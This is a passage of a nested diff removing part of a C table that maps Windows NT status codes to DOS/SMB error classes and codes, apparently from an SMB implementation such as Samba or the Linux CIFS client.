+-	ERRDOS, 487, NT_STATUS_MEMORY_NOT_ALLOCATED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_WORKING_SET_QUOTA}, {
+-	ERRDOS, 19, NT_STATUS_MEDIA_WRITE_PROTECTED}, {
+-	ERRDOS, 21, NT_STATUS_DEVICE_NOT_READY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_GROUP_ATTRIBUTES}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_IMPERSONATION_LEVEL}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANT_OPEN_ANONYMOUS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_VALIDATION_CLASS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_TOKEN_TYPE}, {
+-	ERRDOS, 87, NT_STATUS_BAD_MASTER_BOOT_RECORD}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INSTRUCTION_MISALIGNMENT}, {
+-	ERRDOS, ERRpipebusy, NT_STATUS_INSTANCE_NOT_AVAILABLE}, {
+-	ERRDOS, ERRpipebusy, NT_STATUS_PIPE_NOT_AVAILABLE}, {
+-	ERRDOS, ERRbadpipe, NT_STATUS_INVALID_PIPE_STATE}, {
+-	ERRDOS, ERRpipebusy, NT_STATUS_PIPE_BUSY}, {
+-	ERRDOS, ERRbadfunc, NT_STATUS_ILLEGAL_FUNCTION}, {
+-	ERRDOS, ERRnotconnected, NT_STATUS_PIPE_DISCONNECTED}, {
+-	ERRDOS, ERRpipeclosing, NT_STATUS_PIPE_CLOSING}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PIPE_CONNECTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PIPE_LISTENING}, {
+-	ERRDOS, ERRbadpipe, NT_STATUS_INVALID_READ_MODE}, {
+-	ERRDOS, 121, NT_STATUS_IO_TIMEOUT}, {
+-	ERRDOS, 38, NT_STATUS_FILE_FORCED_CLOSED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_NOT_STARTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_NOT_STOPPED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_COULD_NOT_INTERPRET}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_FILE_IS_A_DIRECTORY}, {
+-	ERRDOS, ERRunsup, NT_STATUS_NOT_SUPPORTED}, {
+-	ERRDOS, 51, NT_STATUS_REMOTE_NOT_LISTENING}, {
+-	ERRDOS, 52, NT_STATUS_DUPLICATE_NAME}, {
+-	ERRDOS, 53, NT_STATUS_BAD_NETWORK_PATH}, {
+-	ERRDOS, 54, NT_STATUS_NETWORK_BUSY}, {
+-	ERRDOS, 55, NT_STATUS_DEVICE_DOES_NOT_EXIST}, {
+-	ERRDOS, 56, NT_STATUS_TOO_MANY_COMMANDS}, {
+-	ERRDOS, 57, NT_STATUS_ADAPTER_HARDWARE_ERROR}, {
+-	ERRDOS, 58, NT_STATUS_INVALID_NETWORK_RESPONSE}, {
+-	ERRDOS, 59, NT_STATUS_UNEXPECTED_NETWORK_ERROR}, {
+-	ERRDOS, 60, NT_STATUS_BAD_REMOTE_ADAPTER}, {
+-	ERRDOS, 61, NT_STATUS_PRINT_QUEUE_FULL}, {
+-	ERRDOS, 62, NT_STATUS_NO_SPOOL_SPACE}, {
+-	ERRDOS, 63, NT_STATUS_PRINT_CANCELLED}, {
+-	ERRDOS, 64, NT_STATUS_NETWORK_NAME_DELETED}, {
+-	ERRDOS, 65, NT_STATUS_NETWORK_ACCESS_DENIED}, {
+-	ERRDOS, 66, NT_STATUS_BAD_DEVICE_TYPE}, {
+-	ERRDOS, ERRnosuchshare, NT_STATUS_BAD_NETWORK_NAME}, {
+-	ERRDOS, 68, NT_STATUS_TOO_MANY_NAMES}, {
+-	ERRDOS, 69, NT_STATUS_TOO_MANY_SESSIONS}, {
+-	ERRDOS, 70, NT_STATUS_SHARING_PAUSED}, {
+-	ERRDOS, 71, NT_STATUS_REQUEST_NOT_ACCEPTED}, {
+-	ERRDOS, 72, NT_STATUS_REDIRECTOR_PAUSED}, {
+-	ERRDOS, 88, NT_STATUS_NET_WRITE_FAULT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_AT_LIMIT}, {
+-	ERRDOS, ERRdiffdevice, NT_STATUS_NOT_SAME_DEVICE}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_FILE_RENAMED}, {
+-	ERRDOS, 240, NT_STATUS_VIRTUAL_CIRCUIT_CLOSED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SECURITY_ON_OBJECT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANT_WAIT}, {
+-	ERRDOS, ERRpipeclosing, NT_STATUS_PIPE_EMPTY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANT_ACCESS_DOMAIN_INFO}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANT_TERMINATE_SELF}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SERVER_STATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DOMAIN_STATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DOMAIN_ROLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_DOMAIN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_EXISTS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_LIMIT_EXCEEDED}, {
+-	ERRDOS, 300, NT_STATUS_OPLOCK_NOT_GRANTED}, {
+-	ERRDOS, 301, NT_STATUS_INVALID_OPLOCK_PROTOCOL}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_DB_CORRUPTION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_GENERIC_NOT_MAPPED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_DESCRIPTOR_FORMAT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_USER_BUFFER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_IO_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_CREATE_ERR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_MAP_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_EXTEND_ERR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NOT_LOGON_PROCESS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SESSION_EXISTS}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_1}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_2}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_3}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_4}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_5}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_6}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_7}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_8}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_9}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_10}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_11}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_12}, {
+-	ERRDOS, ERRbadpath, NT_STATUS_REDIRECTOR_NOT_STARTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REDIRECTOR_STARTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_STACK_OVERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_PACKAGE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_FUNCTION_TABLE}, {
+-	ERRDOS, 203, 0xc0000100}, {
+-	ERRDOS, 145, NT_STATUS_DIRECTORY_NOT_EMPTY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FILE_CORRUPT_ERROR}, {
+-	ERRDOS, 267, NT_STATUS_NOT_A_DIRECTORY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_LOGON_SESSION_STATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SESSION_COLLISION}, {
+-	ERRDOS, 206, NT_STATUS_NAME_TOO_LONG}, {
+-	ERRDOS, 2401, NT_STATUS_FILES_OPEN}, {
+-	ERRDOS, 2404, NT_STATUS_CONNECTION_IN_USE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MESSAGE_NOT_FOUND}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_PROCESS_IS_TERMINATING}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LOGON_TYPE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_GUID_TRANSLATION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANNOT_IMPERSONATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IMAGE_ALREADY_LOADED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_NOT_PRESENT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_LID_NOT_EXIST}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_LID_ALREADY_OWNED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_NOT_LID_OWNER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_COMMAND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_LID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_SELECTOR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_LDT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_SIZE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_OFFSET}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_DESCRIPTOR}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_NE_FORMAT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RXACT_INVALID_STATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RXACT_COMMIT_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MAPPED_FILE_SIZE_ZERO}, {
+-	ERRDOS, ERRnofids, NT_STATUS_TOO_MANY_OPENED_FILES}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANCELLED}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_CANNOT_DELETE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_COMPUTER_NAME}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_FILE_DELETED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_ACCOUNT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_GROUP}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_USER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MEMBERS_PRIMARY_GROUP}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_FILE_CLOSED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_THREADS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_THREAD_NOT_IN_PROCESS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOKEN_ALREADY_IN_USE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_QUOTA_EXCEEDED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_COMMITMENT_LIMIT}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_LE_FORMAT}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_NOT_MZ}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_PROTECT}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_WIN_16}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SERVER_CONFLICT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TIME_DIFFERENCE_AT_DC}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SYNCHRONIZATION_REQUIRED}, {
+-	ERRDOS, 126, NT_STATUS_DLL_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_OPEN_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IO_PRIVILEGE_FAILED}, {
+-	ERRDOS, 182, NT_STATUS_ORDINAL_NOT_FOUND}, {
+-	ERRDOS, 127, NT_STATUS_ENTRYPOINT_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONTROL_C_EXIT}, {
+-	ERRDOS, 64, NT_STATUS_LOCAL_DISCONNECT}, {
+-	ERRDOS, 64, NT_STATUS_REMOTE_DISCONNECT}, {
+-	ERRDOS, 51, NT_STATUS_REMOTE_RESOURCES}, {
+-	ERRDOS, 59, NT_STATUS_LINK_FAILED}, {
+-	ERRDOS, 59, NT_STATUS_LINK_TIMEOUT}, {
+-	ERRDOS, 59, NT_STATUS_INVALID_CONNECTION}, {
+-	ERRDOS, 59, NT_STATUS_INVALID_ADDRESS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DLL_INIT_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MISSING_SYSTEMFILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNHANDLED_EXCEPTION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_APP_INIT_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_CREATE_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_PAGEFILE}, {
+-	ERRDOS, 124, NT_STATUS_INVALID_LEVEL}, {
+-	ERRDOS, 86, NT_STATUS_WRONG_PASSWORD_CORE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_FLOAT_CONTEXT}, {
+-	ERRDOS, 109, NT_STATUS_PIPE_BROKEN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_CORRUPT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_IO_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_EVENT_PAIR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNRECOGNIZED_VOLUME}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SERIAL_NO_DEVICE_INITED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_ALIAS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_NOT_IN_ALIAS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_IN_ALIAS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ALIAS_EXISTS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGON_NOT_GRANTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_SECRETS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SECRET_TOO_LONG}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_DB_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FULLSCREEN_MODE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_CONTEXT_IDS}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_LOGON_TYPE_NOT_GRANTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NOT_REGISTRY_FILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FT_MISSING_MEMBER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ILL_FORMED_SERVICE_ENTRY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_CHARACTER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNMAPPABLE_CHARACTER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNDEFINED_CHARACTER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_VOLUME}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_WRONG_CYLINDER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_UNKNOWN_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_BAD_REGISTERS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DISK_RECALIBRATE_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DISK_OPERATION_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DISK_RESET_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SHARED_IRQ_BUSY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FT_ORPHANING}, {
+-	ERRHRD, ERRgeneral, 0xc000016e}, {
+-	ERRHRD, ERRgeneral, 0xc000016f}, {
+-	ERRHRD, ERRgeneral, 0xc0000170}, {
+-	ERRHRD, ERRgeneral, 0xc0000171}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PARTITION_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_BLOCK_LENGTH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_NOT_PARTITIONED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNABLE_TO_LOCK_MEDIA}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNABLE_TO_UNLOAD_MEDIA}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_EOM_OVERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_MEDIA}, {
+-	ERRHRD, ERRgeneral, 0xc0000179}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_MEMBER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_MEMBER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_KEY_DELETED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_LOG_SPACE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_SIDS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_KEY_HAS_CHILDREN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CHILD_MUST_BE_VOLATILE}, {
+-	ERRDOS, 87, NT_STATUS_DEVICE_CONFIGURATION_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DRIVER_INTERNAL_ERROR}, {
+-	ERRDOS, 22, NT_STATUS_INVALID_DEVICE_STATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IO_DEVICE_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_PROTOCOL_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BACKUP_CONTROLLER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOG_FILE_FULL}, {
+-	ERRDOS, 19, NT_STATUS_TOO_LATE}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_NO_TRUST_LSA_SECRET},
+-/*	{ This NT error code was 'squashed'
+-	 from NT_STATUS_NO_TRUST_SAM_ACCOUNT to
+-	 NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE during the session setup } */
+-	{
+-	ERRDOS, ERRnoaccess, NT_STATUS_NO_TRUST_SAM_ACCOUNT}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_TRUSTED_DOMAIN_FAILURE}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_FILE_CORRUPT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_CANT_START}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_TRUST_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MUTANT_LIMIT_EXCEEDED}, {
+-	ERRDOS, ERRnetlogonNotStarted, NT_STATUS_NETLOGON_NOT_STARTED}, {
+-	ERRSRV, ERRaccountexpired, NT_STATUS_ACCOUNT_EXPIRED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_POSSIBLE_DEADLOCK}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NETWORK_CREDENTIAL_CONFLICT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REMOTE_SESSION_LIMIT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_FILE_CHANGED}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT},
+-/*	{ This NT error code was 'squashed'
+-	 from NT_STATUS_DOMAIN_TRUST_INCONSISTENT to NT_STATUS_LOGON_FAILURE
+-	 during the session setup }  */
+-	{
+-	ERRDOS, ERRnoaccess, NT_STATUS_DOMAIN_TRUST_INCONSISTENT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FS_DRIVER_REQUIRED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_USER_SESSION_KEY}, {
+-	ERRDOS, 59, NT_STATUS_USER_SESSION_DELETED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_LANG_NOT_FOUND}, {
+-	ERRDOS, ERRnoresource, NT_STATUS_INSUFF_SERVER_RESOURCES}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_BUFFER_SIZE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ADDRESS_COMPONENT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ADDRESS_WILDCARD}, {
+-	ERRDOS, 68, NT_STATUS_TOO_MANY_ADDRESSES}, {
+-	ERRDOS, 52, NT_STATUS_ADDRESS_ALREADY_EXISTS}, {
+-	ERRDOS, 64, NT_STATUS_ADDRESS_CLOSED}, {
+-	ERRDOS, 64, NT_STATUS_CONNECTION_DISCONNECTED}, {
+-	ERRDOS, 64, NT_STATUS_CONNECTION_RESET}, {
+-	ERRDOS, 68, NT_STATUS_TOO_MANY_NODES}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_ABORTED}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_TIMED_OUT}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_NO_RELEASE}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_NO_MATCH}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_RESPONDED}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_INVALID_ID}, {
+-	ERRDOS, 59, NT_STATUS_TRANSACTION_INVALID_TYPE}, {
+-	ERRDOS, ERRunsup, NT_STATUS_NOT_SERVER_SESSION}, {
+-	ERRDOS, ERRunsup, NT_STATUS_NOT_CLIENT_SESSION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANNOT_LOAD_REGISTRY_FILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DEBUG_ATTACH_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SYSTEM_PROCESS_TERMINATED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DATA_NOT_ACCEPTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_BROWSER_SERVERS_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_VDM_HARD_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DRIVER_CANCEL_TIMEOUT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REPLY_MESSAGE_MISMATCH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MAPPED_ALIGNMENT}, {
+-	ERRDOS, 193, NT_STATUS_IMAGE_CHECKSUM_MISMATCH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOST_WRITEBEHIND_DATA}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID}, {
+-	ERRSRV, ERRpasswordExpired, NT_STATUS_PASSWORD_MUST_CHANGE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NOT_TINY_STREAM}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RECOVERY_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_STACK_OVERFLOW_READ}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FAIL_CHECK}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DUPLICATE_OBJECTID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_OBJECTID_EXISTS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONVERT_TO_LARGE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RETRY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FOUND_OUT_OF_SCOPE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ALLOCATE_BUCKET}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PROPSET_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MARSHALL_OVERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_VARIANT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_ACCOUNT_LOCKED_OUT}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_HANDLE_NOT_CLOSABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_REFUSED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_GRACEFUL_DISCONNECT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ADDRESS_ALREADY_ASSOCIATED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ADDRESS_NOT_ASSOCIATED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_INVALID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_ACTIVE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NETWORK_UNREACHABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_HOST_UNREACHABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PROTOCOL_UNREACHABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PORT_UNREACHABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REQUEST_ABORTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_ABORTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_COMPRESSION_BUFFER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_USER_MAPPED_FILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_AUDIT_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TIMER_RESOLUTION_NOT_SET}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_COUNT_LIMIT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGIN_TIME_RESTRICTION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGIN_WKSTA_RESTRICTION}, {
+-	ERRDOS, 193, NT_STATUS_IMAGE_MP_UP_MISMATCH}, {
+-	ERRHRD, ERRgeneral, 0xc000024a}, {
+-	ERRHRD, ERRgeneral, 0xc000024b}, {
+-	ERRHRD, ERRgeneral, 0xc000024c}, {
+-	ERRHRD, ERRgeneral, 0xc000024d}, {
+-	ERRHRD, ERRgeneral, 0xc000024e}, {
+-	ERRHRD, ERRgeneral, 0xc000024f}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INSUFFICIENT_LOGON_INFO}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_DLL_ENTRYPOINT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_SERVICE_ENTRYPOINT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LPC_REPLY_LOST}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IP_ADDRESS_CONFLICT1}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IP_ADDRESS_CONFLICT2}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_QUOTA_LIMIT}, {
+-	ERRSRV, 3, NT_STATUS_PATH_NOT_COVERED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_CALLBACK_ACTIVE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LICENSE_QUOTA_EXCEEDED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PWD_TOO_SHORT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PWD_TOO_RECENT}, {
